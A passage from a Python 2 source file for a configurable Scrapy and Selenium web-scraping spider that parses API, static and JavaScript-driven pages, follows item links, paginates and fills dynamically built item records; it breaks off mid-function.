log_scrap.info("--- GenericSpider / spider_config_flat : \n %s ", pformat(spider_config_flat) )
self.spider_config_flat = spider_config_flat
### global infos on spider
self.spider_name = self.spider_config_flat['name']
self.spider_page_url = self.spider_config_flat['page_url']
# self.spider_current_starturl = ""
# self.settings_limit_pages = self.spider_config_flat['LIMIT']
self.settings_limit_pages = self.spider_config_flat['LIMIT_PAGES']
self.settings_limit_items = self.spider_config_flat['LIMIT_ITEMS']
log_scrap.info("--- GenericSpider / settings_limit_pages : %s ", self.settings_limit_pages )
log_scrap.info("--- GenericSpider / settings_limit_items : %s ", self.settings_limit_items )
### get settings for selenium
self.parse_reactive = self.spider_config_flat['parse_reactive']
self.scroll_pause_time = self.spider_config_flat['scroll_pause_time']
self.delay_driver = self.spider_config_flat['wait_driver'] # 5.0
self.delay_new_page = self.spider_config_flat['wait_page'] # 1.5
self.delay_implicit = self.spider_config_flat['wait_implicit'] # 0.5
self.delay_driver = self.spider_config_flat['scroll_pause_time'] # .5
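# NOTE : the line above overwrites the 'wait_driver' value stored in self.delay_driver a few lines earlier ;
# it looks like it was meant for a separate delay (cf the commented-out self.delay_item just below) - kept as-is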
# self.delay_item = self.spider_config_flat['LIMIT'] # 1.0
### getting all the config args from spider_config_flat (i.e. next_page, ...)
log_scrap.info("--- GenericSpider / passing kwargs..." )
for k, v in spider_config_flat.iteritems() :
# log_scrap.info(" - %s : %s " %(k, v) )
self.__dict__[k] = v
### getting data model for later use in item
log_scrap.info("--- GenericSpider / datamodel[:1] : \n %s \n ...", pformat(datamodel[:1]) )
### storing correspondence dicts from datamodel
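# the three structures built below are used later to fill each scraped item :
# - dm_core : core field names --> field types
# - dm_custom : custom field ids (as str) --> field name + type
# - dm_item_related : list of every field name/id the dynamic Item class must expose (cf create_item_class used in parse())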
self.dm_core = { i["field_name"] : { "field_type" : i["field_type"] } for i in datamodel if i["field_class"] == "core" }
self.dm_core_item_related = DATAMODEL_CORE_FIELDS_ITEM
self.dm_custom = { str(i["_id"]) : { "field_type" : i["field_type"],
"field_name" : i["field_name"]
} for i in datamodel if i["field_class"] == "custom" }
log_scrap.info("--- GenericSpider / dm_custom : \n %s", pformat(self.dm_custom) )
self.dm_custom_list = self.dm_custom.keys()
self.dm_item_related = self.dm_custom_list + self.dm_core_item_related
log_scrap.info("--- GenericSpider / dm_item_related : \n %s", pformat(self.dm_item_related) )
### SPLASH
### cf : https://blog.scrapinghub.com/2015/03/02/handling-javascript-in-scrapy-with-splash/
def start_requests(self) :
log_scrap.info("--- GenericSpider.start_requests ... " )
for url in self.start_urls :
log_scrap.info("--- GenericSpider.start_requests / url : %s ", url )
# self.spider_current_starturl = url
self.there_is_more_items_to_scrap_dict[url] = True
log_scrap.info("--- GenericSpider.start_requests / starting first Scrapy request... " )
yield Request(url=url, callback=self.parse, dont_filter=True, meta={'start_url': url} )
# yield Request(url=url, callback=self.parse, meta={'start_url': url} )
### parsing with scrapy
def parse(self, response):
""" parsing pages to scrap data with Scrapy requests"""
### close spider if exception
if 'Bandwidth exceeded' in response.body:
raise CloseSpider('bandwidth_exceeded')
log_scrap.debug(u"\n>>> NEW PARSING >>>\n" )
log_scrap.info("--- GenericSpider.parse ..." )
log_scrap.info("\n--- GenericSpider.parse /response : \n%s" , response)
log_scrap.info("\n--- GenericSpider.parse /response : \n%s \n" , response.__dict__.keys() )
# for k, v in response.__dict__.iteritems() :
# log_scrap.info("\n--- [k] {} : [v] {} : ".format(k,v))
# print response._body
start_url = response.meta["start_url"]
log_scrap.info("--- GenericSpider.parse / start_url : %s", start_url )
### - - - - - - - - - - - - - - - - - - - - - - - ###
### start request with API crawler
### - - - - - - - - - - - - - - - - - - - - - - - ###
# if self.spider_config_flat["parse_api"] == True :
if self.parse_api == True :
log_scrap.info("\n--- GenericSpider.parse / starting request on API endpoint... " )
jsonresponse = json.loads(response.body_as_unicode())
# log_scrap.info("--- GenericSpider.parse / jsonresponse : \n%s", jsonresponse )
log_scrap.info("--- GenericSpider.parse / jsonresponse received..." )
raw_items_list = get_dictvalue_from_xpath(jsonresponse, self.item_xpath)
# raw_items_list = jsonresponse[self.item_xpath]
log_scrap.info("--- GenericSpider.parse / raw_items_list[0] : \n%s\n...", pformat(raw_items_list[0]) )
### - - - - - - - - - - ###
### PARSING PAGE - API
### start parsing page : loop through data items in page in response
if len(raw_items_list) != 0 :
log_scrap.info("--- GenericSpider. / START LOOPING raw_items_list WITH API ..." )
# while self.there_is_more_items_to_scrap_dict[start_url] :
for raw_data in raw_items_list :
self.item_count += 1
### check if can continue depending on item_count
if self.settings_limit_items == 0 or self.item_count <= self.settings_limit_items :
print()
log_scrap.debug(u">>> NEW ITEM - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEW ITEM - current start_url : {} >>>".format(start_url) )
log_scrap.debug(u">>> NEW ITEM - API - item n°{} >>> \n".format(self.item_count) )
### instantiate Item to fill from datamodel --> cf items.py
itemclass = create_item_class( 'GenericItemClass', fields_list = self.dm_item_related )
item = itemclass()
### add global info to item : i.e. core fields in dm_core_item_related list
item[ 'spider_id' ] = self.spider_id
item[ 'added_by' ] = self.user_id
item[ 'added_at' ] = time.time() # timestamp
item[ 'link_src' ] = response._url
item[ 'page_n' ] = self.page_count
item[ 'item_n' ] = self.item_count
### extract data and feed it to the Item instance based on spider_config_flat
item = self.fill_item_from_results_page(raw_data, item, is_api_rest=True, item_n=self.item_count)
### - - - - - - - - - - ###
### FOLLOW LINK - API
### if need to follow to extract all data
if self.spider_config_flat["parse_follow"] == True :
log_scrap.debug(u">>> FOLLOW LINK - API - item n°{} / page n°{} >>>>>> \n".format(self.item_count, self.page_count) )
log_scrap.info("--- GenericSpider. / self.follow_xpath : %s", self.follow_xpath )
# follow_link_raw = raw_data[ self.follow_xpath ]
follow_link_raw = get_dictvalue_from_xpath(raw_data, self.follow_xpath)
log_scrap.info(" --> follow_link RAW ({}) : {} ".format(type(follow_link_raw),follow_link_raw) )
url_follow = ""
if self.api_follow_root != "" :
url_follow = self.api_follow_root
else :
url_follow = self.page_url
# complete follow link if needed
follow_link = self.clean_link(follow_link_raw, url_root=url_follow)
log_scrap.info(" --> follow_link CLEAN : %s ", follow_link )
# store follow_link
item[ 'link_data' ] = follow_link
url = item['link_data']
follow_is_api = self.follow_is_api
try :
yield scrapy.Request(url, callback=self.parse_detailed_page, meta={ 'item': item, 'start_url' : start_url, 'item_n' : self.item_count , 'parse_api' : follow_is_api })
except :
yield item
### if no follow link
else :
### item completion is finished - yield it to trigger the item pipeline (store in db for instance)
yield item
# log_scrap.info(" --> item : \n %s \n", pformat(item) )
log_scrap.debug(u" --> item ..." )
else :
log_scrap.warning(u"--- GenericSpider. / OUT OF LIMIT_ITEMS - items count : {} - LIMIT_ITEMS : {}".format(self.item_count, self.LIMIT_ITEMS) )
# self.there_is_more_items_to_scrap_dict[start_url] = False
# log_scrap.warning(u"--- GenericSpider. / OUT OF LIMIT_ITEMS - items count : {} - LIMIT_ITEMS : {}".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF LIMIT_ITEMS')
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - items count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF ITEMS')
### - - - - - - - - - - - - ###
### NEXT PAGE - API
if self.test_limit == None or self.page_count < self.test_limit :
if self.page_count < self.settings_limit_pages or self.settings_limit_pages == 0 :
log_scrap.info("--- GenericSpider.parse (API) >>> PAGE n°{} DONE -> NEXT PAGE >>> \n".format(self.page_count) )
### get and go to next page
self.page_count += 1
url_next = ""
if self.api_pagination_root != "" :
url_next = self.api_pagination_root
else :
url_next = self.page_url
log_scrap.debug(u">>> NEXT PAGE - spider_name : '%s' >>>" %(self.spider_name) )
log_scrap.debug(u">>> NEXT PAGE - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEXT PAGE - current start_url : {} >>>".format(start_url) )
next_page = url_next + str(self.page_count)
log_scrap.info("--- GenericSpider.parse >>> NEXT PAGE II : %s", next_page )
yield response.follow(next_page, callback=self.parse, meta={'start_url': start_url} )
else :
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - page n°{} - limit : {} - test_limit : {} ".format(self.page_count, self.settings_limit_pages, self.test_limit) )
# raise CloseSpider('OUT OF TEST_LIMIT')
else :
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - items count : {} - LIMIT_ITEMS : {} ".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF TEST_LIMIT')
### - - - - - - - - - - - - - - - - - - - - - - - ###
### start requests with pure Scrapy requests
### - - - - - - - - - - - - - - - - - - - - - - - ###
elif self.spider_config_flat["parse_reactive"] == False :
# elif self.parse_reactive == False :
log_scrap.info("\n--- GenericSpider.parse / starting requests with Scrapy... " )
# self.parse_scrapy(response)
### find items list
log_scrap.info("--- GenericSpider.parse / self.item_xpath : %s", self.item_xpath )
raw_items_list = response.xpath(self.item_xpath)
log_scrap.info("--- GenericSpider.parse / len(raw_items_list) : %d ", len(raw_items_list) )
### - - - - - - - - - - - ###
### PARSING PAGE - SCRAPY
### start parsing page : loop through data items in page in response
if len(raw_items_list) != 0 :
log_scrap.info("--- GenericSpider. / START LOOPING raw_items_list WITH SCRAPY ..." )
for raw_data in raw_items_list :
self.item_count += 1
### check if can continue depending on item_count
if self.settings_limit_items == 0 or self.item_count <= self.settings_limit_items :
print()
log_scrap.debug(u">>> NEW ITEM - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEW ITEM - current start_url : {} >>>".format(start_url) )
log_scrap.debug(u">>> NEW ITEM - Scrapy - item n°{} / page n°{} >>> \n".format(self.item_count, self.page_count) )
# print ">>> raw_data : \n", raw_data.extract()
### instantiate Item to fill from datamodel --> cf items.py
itemclass = create_item_class( 'GenericItemClass', fields_list = self.dm_item_related )
item = itemclass()
### add global info to item : i.e. core fields in dm_core_item_related list
item[ 'spider_id' ] = self.spider_id
item[ 'added_by' ] = self.user_id
item[ 'added_at' ] = time.time() # timestamp
item[ 'link_src' ] = response._url
item[ 'page_n' ] = self.page_count
item[ 'item_n' ] = self.item_count
### extract data and feed it to the Item instance based on spider_config_flat
item = self.fill_item_from_results_page(raw_data, item, item_n=self.item_count)
### - - - - - - - - - - - ###
### FOLLOW LINK - SCRAPY
### if need to follow to extract all data
if self.spider_config_flat["parse_follow"] == True :
log_scrap.debug(u">>> FOLLOW LINK - SCRAPY - item n°{} / page n°{} >>>>>> \n".format(self.item_count, self.page_count) )
log_scrap.info("--- GenericSpider. / self.follow_xpath : %s", self.follow_xpath )
follow_link = raw_data.xpath( self.follow_xpath ).extract_first()
log_scrap.info(" --> follow_link RAW ({}) : {} ".format(type(follow_link),follow_link) )
url_follow = ""
if self.api_follow_root != "" :
url_follow = self.api_follow_root
# complete follow link if needed
follow_link = self.clean_link(follow_link, url_root=url_follow)
# log_scrap.info(" --> follow_link CLEAN : %s ", follow_link )
log_scrap.info(" --> follow_link CLEAN ({}) : {} ".format(type(follow_link),follow_link) )
# store follow_link
item[ 'link_data' ] = follow_link
url = item['link_data']
try :
log_scrap.warning(u">>> FOLLOWING LINK --> url : {} ".format(url) )
# yield Request(url, callback=self.parse_detailed_page, meta={ 'item': item, 'start_url' : start_url } )
yield scrapy.Request(url, callback=self.parse_detailed_page, meta={ 'item': item, 'start_url' : start_url , 'item_n' : self.item_count , 'parse_api' : False} )
# log_scrap.warning(u">>> FOLLOWING LINK --> url : {} / WORKED !!! ".format(url) )
except :
log_scrap.warning(u">>> FOLLOW LINK - NOT WORKING : {} ".format(url) )
yield item
### if no follow link
else :
log_scrap.warning(u">>> NO FOLLOW LINK ... " )
### item completion is finished - yield it to trigger the item pipeline (store in db for instance)
# log_scrap.info(">>> GenericSpider.parse - item.items() : \n %s", item.items() )
# log_scrap.info(">>> GenericSpider.parse - item.keys() : \n %s", item.items() )
yield item
# print ("\n>>> NEXT ITEM " + ">>> >>> "*10, "\n")
# log_scrap.info(" --> item : \n %s \n", pformat(item) )
log_scrap.debug(u" --> item ..." )
else :
log_scrap.warning(u"--- GenericSpider. / OUT OF LIMIT_ITEMS - items count : {} - LIMIT_ITEMS : {}".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF LIMIT_ITEMS')
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - items count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF ITEMS')
### - - - - - - - - - - ###
### NEXT PAGE - SCRAPY
### check if there is a test_limit
if self.test_limit == None or self.page_count < self.test_limit :
if self.page_count < self.settings_limit_pages or self.settings_limit_pages == 0 :
log_scrap.info("--- GenericSpider.parse (Scrapy) >>> PAGE n°{} DONE -> NEXT PAGE >>> \n".format(self.page_count) )
### get and go to next page
is_next_page, next_page = self.get_next_page(response, start_url)
if is_next_page :
self.page_count += 1
url_next = ""
if self.api_pagination_root != "" :
url_next = self.api_pagination_root
log_scrap.debug(u">>> NEXT PAGE - spider_name : '%s' >>>" %(self.spider_name) )
log_scrap.debug(u">>> NEXT PAGE - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEXT PAGE - current start_url : {} >>>".format(start_url) )
log_scrap.info("--- GenericSpider.parse >>> NEXT PAGE I : %s", next_page )
next_page = self.clean_link(next_page, url_root=url_next)
log_scrap.info("--- GenericSpider.parse >>> NEXT PAGE II : %s", next_page )
yield response.follow(next_page, callback=self.parse, meta={'start_url': start_url} )
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / NO MORE PAGE TO SCRAP - pages count : {} ".format(self.page_count) )
# raise CloseSpider('NO MORE PAGE TO SCRAP')
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - page n°{} - limit : {} - test_limit : {} / except -> break".format(self.page_count, self.settings_limit_pages, self.test_limit) )
# raise CloseSpider('OUT OF TEST_LIMIT')
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - items count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF TEST_LIMIT')
### - - - - - - - - - - - - - - - - - - - - - - - ###
### start requests with Selenium
### - - - - - - - - - - - - - - - - - - - - - - - ###
else :
### initiate selenium browser
### cf : https://github.com/voliveirajr/seleniumcrawler/blob/master/seleniumcrawler/spiders/seleniumcrawler_spider.py
log_scrap.info("\n--- GenericSpider.parse / starting Selenium driver... " )
# retrieve exec path for chromedriver from settings_scrapy.py
### GET APP MODE FROM ENV VARS
app_mode = os.environ.get('APP_MODE', 'default')
log_scrap.debug(u"--- GenericSpider.parse / APP_MODE : %s", app_mode)
chromedriver_path = CHROMEDRIVER_PATH_LIST[ app_mode ]
log_scrap.debug(u"--- GenericSpider.parse / chromedriver_path : %s", chromedriver_path)
### specify executable path to launch webdriver
# cf : where chromedriver was installed when `brew install chromedriver`
self.driver = webdriver.Chrome(executable_path=chromedriver_path, chrome_options=options_selenium)
# self.driver = webdriver.Chrome(chrome_options=options_selenium)
# self.driver = webdriver.Firefox()
# self.driver = webdriver.Chrome()
# self.driver = webdriver.PhantomJS() ### deprecated
### setup waiting times
# self.driver.set_page_load_timeout(60)
self.wait_driver = WebDriverWait(self.driver, self.delay_driver)
self.wait_page = WebDriverWait(self.driver, self.delay_new_page)
self.driver.implicitly_wait(self.delay_implicit)
log_scrap.debug(u"--- GenericSpider. / self.delay_driver : %s", self.delay_driver )
log_scrap.debug(u"--- GenericSpider. / self.delay_new_page : %s", self.delay_new_page )
log_scrap.debug(u"--- GenericSpider. / self.delay_implicit : %s", self.delay_implicit )
### start parsing with selenium
log_scrap.debug(u"--- GenericSpider. / response._url : %s", response._url )
try :
self.driver.get(response._url)
### try scroll_down if needed in config
if self.spider_config_flat['scroll_down'] :
log_scrap.info("--- GenericSpider. / scroll_down is TRUE ... " )
# log_scrap.debug(u"--- GenericsSpider. / scroll_down - self.spider_config_flat : \n%s", pformat(self.spider_config_flat) )
scroll_pause_time = self.spider_config_flat["scroll_pause_time"]
max_loops = self.spider_config_flat["scroll_loops"]
self.driver = scroll_down(self.driver, scroll_pause_time, max_loops)
# scroll_down(self.driver, scroll_pause_time, max_loops)
log_scrap.info("--- GenericSpider. / url '{}' is loaded ... ".format( response._url ))
except :
# self.there_is_more_items_to_scrap = False
self.there_is_more_items_to_scrap_dict[start_url] = False
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
raise CloseSpider('DRIVER NOT RESPONDING')
### clean original xpath from strings
strings_to_clean = [
'/@src',
'/@href',
'/text()',
'/@*[name()="xlink:href"]',
'/@datetime'
]
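# these suffixes come from xpaths written for Scrapy (attribute / text extraction) ;
# Selenium's find_element(s)_by_xpath needs element nodes, so clean_xpath_for_reactive()
# strips them before the xpaths are reused on the driver below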
# while self.there_is_more_items_to_scrap :
while self.there_is_more_items_to_scrap_dict[start_url] :
# log_scrap.debug(u"--- GenericSpider. / while loop continues : %s", self.there_is_more_items_to_scrap )
log_scrap.debug(u"--- GenericSpider. / while loop continues : %s", self.there_is_more_items_to_scrap_dict[start_url] )
try :
### wait / debug page content
page_source_code = self.driver.page_source.encode("utf-8")
# log_scrap.debug(u"--- GenericSpider. / page_source_code : \n %s ", page_source_code )
time.sleep(self.delay_new_page)
### start parsing page :
log_scrap.info("--- GenericSpider. / self.item_xpath : %s", self.item_xpath )
raw_items_list = self.driver.find_elements_by_xpath(self.item_xpath)
log_scrap.info("--- GenericSpider. / raw_items_list length : %s", len(raw_items_list) )
# log_scrap.info("--- GenericSpider. / raw_items_list[0].text : \n%s", raw_items_list[0].text )
# current_item_index = 0
### - - - - - - - - - - - - ###
### PARSING PAGE - SELENIUM
# loop through data items in page in response
if len(raw_items_list) != 0 :
# log_scrap.info("--- GenericSpider. / START PARSING WITH SELENIUM ...\n" )
for raw_data in raw_items_list :
print()
log_scrap.debug(u"--- GenericSpider. / START LOOPING raw_items_list WITH SELENIUM ..." )
### add +1 to items count
self.item_count += 1
# log_scrap.debug(u"--- GenericSpider. / VARIABLES - spider_name : {} - item n°{} - there_is_more_items_to_scrap_dict[start_url] : {} ".format(str(self.spider_name), self.item_count, self.there_is_more_items_to_scrap_dict[start_url]) )
# log_scrap.debug(u"--- GenericSpider. / VARIABLES - spider_name : {} - item n°{} ".format(self.spider_name, self.item_count) )
# log_scrap.debug(u"--- GenericSpider. / VARIABLES - item n°{} ".format(self.item_count) )
# log_scrap.debug(u"--- GenericSpider. / VARIABLES - spider_name : '%s' - item n°%s " %(self.spider_name, self.item_count) )
### check if can continue depending on item_count
if self.settings_limit_items == 0 or self.item_count <= self.settings_limit_items :
log_scrap.debug(u">>> NEW ITEM - spider_name : '%s' >>>" %(self.spider_name) )
log_scrap.debug(u">>> NEW ITEM - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEW ITEM - current start_url : {} >>>".format(start_url) )
log_scrap.debug(u">>> NEW ITEM - Selenium - item n°{} / page n°{} >>> \n".format(self.item_count, self.page_count) )
### instantiate Item to fill from datamodel --> cf items.py
itemclass = create_item_class( 'GenericItemClass', fields_list = self.dm_item_related )
item = itemclass()
### add global info to item : i.e. core fields in dm_core_item_related list
item[ 'spider_id' ] = self.spider_id
item[ 'added_by' ] = self.user_id
item[ 'added_at' ] = time.time() # timestamp
item[ 'link_src' ] = response._url
item[ 'page_n' ] = self.page_count
item[ 'item_n' ] = self.item_count
### extract data and feed it to the Item instance based on spider_config_flat
item = self.fill_item_from_results_page(raw_data, item, is_reactive=True, strings_to_clean=strings_to_clean, item_n=self.item_count )
### - - - - - - - - - - ###
### FOLLOW LINK - SELENIUM
### find follow link to open detailed item view
if self.spider_config_flat["parse_follow"] == True :
log_scrap.debug(u">>> FOLLOW LINK - SELENIUM - item n°{} / page n°{} >>>>>> \n".format(self.item_count, self.page_count) )
log_scrap.info("--- GenericSpider. / self.follow_xpath : %s", self.follow_xpath )
### follow link with Scrapy
try :
log_scrap.debug(u"--- GenericSpider. / follow link with Scrapy ..." )
# log_scrap.debug(u"--- GenericSpider. / get href of follow_link ..." )
follow_link_xpath = clean_xpath_for_reactive(self.follow_xpath, strings_to_clean)
log_scrap.info(" --> follow_link_xpath : %s ", follow_link_xpath )
follow_link = raw_data.find_element_by_xpath( follow_link_xpath ).get_attribute('href')
log_scrap.info(" --> follow_link RAW : %s ", follow_link )
url_follow = ""
if self.api_follow_root != "" :
url_follow = self.api_follow_root
# complete follow link if needed
follow_link = self.clean_link(follow_link, url_root=url_follow)
log_scrap.info(" --> follow_link CLEAN ({}) : {}".format(type(follow_link), follow_link ) )
# store follow_link
item[ 'link_data' ] = follow_link
url = item['link_data']
try :
log_scrap.warning(u">>> FOLLOWING LINK --> url : {} ".format(url) )
yield scrapy.Request(url, callback=self.parse_detailed_page, meta={'item': item, 'start_url' : start_url , 'item_n' : self.item_count , 'parse_api' : False})
except :
log_scrap.warning(u">>> FOLLOW LINK - NOT WORKING : {} ".format(url) )
yield item
### follow link with Selenium
### FIND A WEBSITE TEST FOR REACTIVE DETAILED PAGES
except :
log_scrap.debug(u"--- GenericSpider. / follow link with Selenium ..." )
follow_link_xpath = clean_xpath_for_reactive(self.follow_xpath, strings_to_clean)
log_scrap.info("--- GenericSpider. / self.follow_link_xpath : %s", self.follow_link_xpath )
follow_link = raw_data.find_element_by_xpath( follow_link_xpath )
### open link in new tab ?
follow_link.click()
### get data and save data
try :
log_scrap.debug(u"--- GenericSpider. / get data and save data ..." )
item = self.fill_item_from_results_page(raw_data, item, is_reactive=True, strings_to_clean=strings_to_clean, item_n=self.item_count )
### back to previous page and scrap from where it left
### cf : https://selenium-python.readthedocs.io/navigating.html#navigation-history-and-location
self.driver.back()
yield item
except :
yield item
### if no follow link
else :
yield item
# log_scrap.info(" --> item : \n %s \n", pformat(item) )
log_scrap.debug(u" --> item ..." )
else :
self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF LIMIT_ITEMS - items count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
raise CloseSpider('OUT OF LIMIT_ITEMS')
break
else :
self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF ITEMS - page n°{} - limit : {} - test_limit : {} / except -> break".format(self.page_count, self.settings_limit_pages, self.test_limit) )
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
# raise CloseSpider('OUT OF TEST_LIMIT')
break
### - - - - - - - - - - - - ###
### NEXT PAGE - SELENIUM
if self.test_limit == None or self.page_count < self.test_limit :
if self.there_is_more_items_to_scrap_dict[start_url] :
if self.page_count < self.settings_limit_pages or self.settings_limit_pages == 0 :
print ()
log_scrap.debug(u">>> NEXT PAGE - spider_name : '%s' >>>" %(self.spider_name) )
log_scrap.info(" --- GenericSpider.parse (Selenium) >>> PAGE n°{} DONE -> NEXT PAGE >>> \n".format(self.page_count) )
### add +1 to parsed pages
self.page_count += 1
log_scrap.debug(u">>> NEXT PAGE - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEXT PAGE - current start_url : {} >>>".format(start_url) )
### find next page btn in current view
log_scrap.info("--- GenericSpider. / self.next_page : %s", self.next_page )
next_page_xpath = clean_xpath_for_reactive(self.next_page, strings_to_clean)
log_scrap.info("--- GenericSpider. / next_page_xpath : %s", next_page_xpath )
# next_page = re.sub("|".join(strings_to_clean), "", next_page )
# try :
# element_present = EC.presence_of_element_located((By.XPATH, next_page_xpath ))
# log_scrap.info("--- GenericSpider. / next_page present : %s", element_present )
# self.wait.until(element_present)
# next_page = self.wait.until( EC.element_to_be_clickable(element_present) )
# next_page = self.driver.find_element_by_xpath( next_page_xpath )
next_page = self.driver.find_element(By.XPATH, next_page_xpath )
log_scrap.info("--- GenericSpider. / next_page : %s", next_page )
log_scrap.info("--- GenericSpider. / next_page.text : %s", next_page.text )
# except TimeoutException:
# except :
# log_scrap.error("--- GenericSpider. / Timed out waiting for page to load")
### click next button and wait for ajax calls to complete (post and get)
### cf : http://www.obeythetestinggoat.com/how-to-get-selenium-to-wait-for-page-load-after-a-click.html
# def wait_for(condition_function):
# start_time = time.time()
# while time.time() < start_time + 3:
# if condition_function():
# return True
# else:
# time.sleep(0.1)
# raise Exception ('Timeout waiting for {}'.format(condition_function.__name__) )
# def link_has_gone_stale():
# try:
# # poll the link with an arbitrary call
# next_page.find_elements_by_xpath(self.item_xpath)
# return False
# except StaleElementReferenceException :
# return True
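# A commented sketch of the same "wait until the old results are stale" idea using
# Selenium's built-in expected condition (assumes EC is imported as in the commented
# code above; illustration only -- the actual wait used below relies on jQuery.active
# and document.readyState):
# old_item = raw_items_list[0] if raw_items_list else None
# next_page.click()
# if old_item is not None:
#     self.wait_page.until(EC.staleness_of(old_item))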
log_scrap.debug(u"--- ... ---")
try :
log_scrap.info("--- GenericSpider. / next_page.click() " )
next_page.click()
except :
# log_scrap.info("--- GenericSpider. / next_page.send_keys( \ n )" )
# next_page.send_keys("\n")
# added this step for compatibility of scrolling to the view
log_scrap.error("--- GenericSpider. / ALTERNATIVE next_page.click() " )
# self.driver.execute_script("return arguments[0].scrollIntoView();", next_page)
# next_page.click()
self.driver.execute_script("arguments[0].click();", next_page)
### wait after click
try :
log_scrap.info("--- GenericSpider. / wait for ajax to finish... " )
# wait_for(link_has_gone_stale)
self.wait_page.until(lambda driver: self.driver.execute_script('return jQuery.active') == 0)
self.wait_page.until(lambda driver: self.driver.execute_script('return document.readyState') == 'complete')
# time.sleep(self.delay_implicit)
time.sleep(self.delay_new_page)
except :
log_scrap.error("--- GenericSpider. / !!! FAIL / wait for ajax to finish... " )
else :
# self.there_is_more_items_to_scrap = False
self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF PAGES TO SCRAP - page n°{} / except -> break".format(self.page_count) )
self.driver.close()
raise CloseSpider('OUT OF PAGES TO SCRAP')
break
else :
# self.there_is_more_items_to_scrap = False
self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - page n°{} - limit : {} - test_limit : {} / except -> break".format(self.page_count, self.settings_limit_pages, self.test_limit) )
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
# raise CloseSpider('OUT OF TEST_LIMIT')
break
except :
log_scrap.warning(u"--- GenericSpider. / NO MORE ITEMS TO SCRAP - item_count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
raise CloseSpider('NO MORE ITEMS TO SCRAP')
break
### generic function to fill item from result
def fill_item_from_results_page (self,
raw_data, item,
is_reactive=False,
is_api_rest=False,
strings_to_clean=None,
item_n=""
) :
""" fill item """
# log_scrap.debug(u" -+- fill_item_from_results_page " )
log_scrap.debug(u" -+- fill_item_from_results_page : item n°{}".format( item_n ) )
# log_scrap.info(" -+- item : \n %s \n", pformat(item) )
# log_scrap.info(" -+- raw_data : \n %s \n", pformat(raw_data) )
### extract data and feed it to Item instance based on spider_config_flat
for dm_field in self.dm_custom_list :
### first, checks if xpath exists in spider_config_flat
if dm_field in self.spider_config_flat :
### check if field filled in spider_config_flat is not empty
if self.spider_config_flat[ dm_field ] != [] and self.spider_config_flat[ dm_field ] != "" :
full_data = None
# dm_name = str( self.dm_custom[dm_field]["field_name"] )
dm_name = self.dm_custom[dm_field]["field_name"]
dm_type = self.dm_custom[dm_field]["field_type"]
# dm_name = dm_field[u"field_name"]
# dm_type = dm_field[u"field_type"]
# log_scrap.info(" -+- extract / dm_name : %s ", dm_name )
### fill item field corresponding to xpath
item_field_xpath = self.spider_config_flat[ dm_field ]
### extract data with Scrapy request
if is_reactive == False and is_api_rest == False :
try :
# log_scrap.debug(u" -+- extract / with Scrapy ... " )
# log_scrap.info(" -+- extract / item_field_xpath : {} ".format(item_field_xpath ))
log_scrap.debug(u" -+- extract Scrapy / dm_name : %s - item_field_xpath : %s " %(dm_name, item_field_xpath ))
full_data = raw_data.xpath( item_field_xpath ).extract()
except :
log_scrap.error(" -+- !!! extract FAILED / with Scrapy ... " )
### extract data for API REST scraper with Scrapy request
elif is_reactive == False and is_api_rest == True :
log_scrap.info(" -+- extract API / dm_name : %s - item_field_xpath : %s " %(dm_name, item_field_xpath ))
### try extracting from a JSON
try :
full_data = get_dictvalue_from_xpath(raw_data, item_field_xpath)
if type(full_data) != list :
print ()
full_data = [ full_data ]
except :
pass
### extract data with Selenium
else :
try :
# log_scrap.debug(u" -+- extract / with Selenium ... " )
# item_field_xpath = re.sub("|".join(strings_to_clean), "", item_field_xpath )
item_field_xpath = clean_xpath_for_reactive(item_field_xpath, strings_to_clean)
# log_scrap.info(" -+- extract / item_field_xpath : {} ".format(item_field_xpath ))
